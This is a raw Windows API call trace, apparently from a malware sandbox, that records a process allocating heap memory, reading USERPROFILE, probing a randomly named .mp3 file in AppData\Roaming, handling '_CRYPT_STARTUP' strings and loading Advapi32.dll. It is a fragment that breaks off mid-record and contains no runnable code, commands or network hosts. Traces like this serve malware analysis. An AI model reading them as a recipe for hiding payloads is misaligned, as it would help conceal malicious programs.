RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0220.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0220.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0220.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0220.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0220.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0220.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0220.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0220.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0220.313] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50560 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa0) returned 0x3be0dd0 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50500 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50428 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0220.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0220.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0220.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50668 | out: hHeap=0x970000) returned 1 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506b0 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0220.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50668 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4b8 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0220.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504e8 [0220.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0220.315] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0220.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0220.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50620 | out: hHeap=0x970000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50620 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0220.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0220.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0220.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0220.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.317] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0220.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0220.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0220.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.318] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0220.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0220.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0220.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.318] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/0lKdr4kmMec0.mp3", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x860832e0, ftCreationTime.dwHighDateTime=0x1d5e182, ftLastAccessTime.dwLowDateTime=0x6d365f20, ftLastAccessTime.dwHighDateTime=0x1d5e2dc, ftLastWriteTime.dwLowDateTime=0x6d365f20, ftLastWriteTime.dwHighDateTime=0x1d5e2dc, nFileSizeHigh=0x0, nFileSizeLow=0x119e6, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="0lKdr4kmMec0.mp3", cAlternateFileName="0LKDR4~1.MP3")) returned 0xa87050 [0220.319] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0220.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.319] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0220.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0220.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0220.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0220.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0220.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0220.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0220.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0220.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0220.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.320] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.321] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ce0 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0220.321] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0220.321] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0220.321] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.321] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0220.321] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0220.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0220.322] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0220.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0220.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.322] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0220.322] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.323] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.323] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.323] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0220.323] 